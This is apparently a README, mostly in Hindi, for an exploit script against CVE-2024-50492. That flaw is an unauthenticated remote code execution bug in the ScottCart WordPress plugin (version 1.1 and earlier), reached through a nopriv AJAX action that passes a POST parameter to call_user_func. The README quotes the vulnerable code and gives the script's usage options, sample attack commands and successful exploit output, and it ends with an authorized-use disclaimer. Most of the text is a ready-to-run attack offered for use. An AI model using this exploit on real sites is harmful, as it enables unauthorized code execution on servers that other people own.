
ScottCart <= 1.1 - अनधिकृत दूरस्थ कोड निष्पादन
🔥 ScottCart <= 1.1 के लिए शोषण स्क्रिप्ट - बिना प्रमाणीकरण के रिमोट कोड निष्पादन
🧑💻 Nxploit द्वारा – खालेद अलेनाज़ी
WordPress के लिए ScottCart प्लगइन (संस्करण ≤ 1.1) रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है।
यह बिना प्रमाणीकरण के हमलावरों को एक संवेदनशील AJAX एंडपॉइंट के माध्यम से सर्वर पर मनमानी PHP फ़ंक्शन निष्पादित करने की अनुमति देता है।
प्लगइन एक असुरक्षित AJAX एक्शन पंजीकृत करता है:
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
जो निष्पादित करता है:
call_user_func($_POST['function']);
हमलावरों को किसी भी मौजूदा PHP फ़ंक्शन को कॉल करने की अनुमति देता है, जैसे:
phpinfo()scottcart_get_the_user_ip()system() ← यदि संशोधित वातावरण में विस्तारित किया गया होphpinfo()results_2025-03-26_14-33-01.txt)User-Agent, त्रुटि प्रबंधन, और SSL अनदेखाusage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
options:
-h, --help Show this help message and exit
-u URL, --url URL Target base URL (e.g., http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Function to call (default: phpinfo)
phpinfo() के साथ PoC):python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
📁 और इसमें सहेजा गया: results_2025-03-26_14-33-01.txt
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
उन सिस्टम के खिलाफ उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।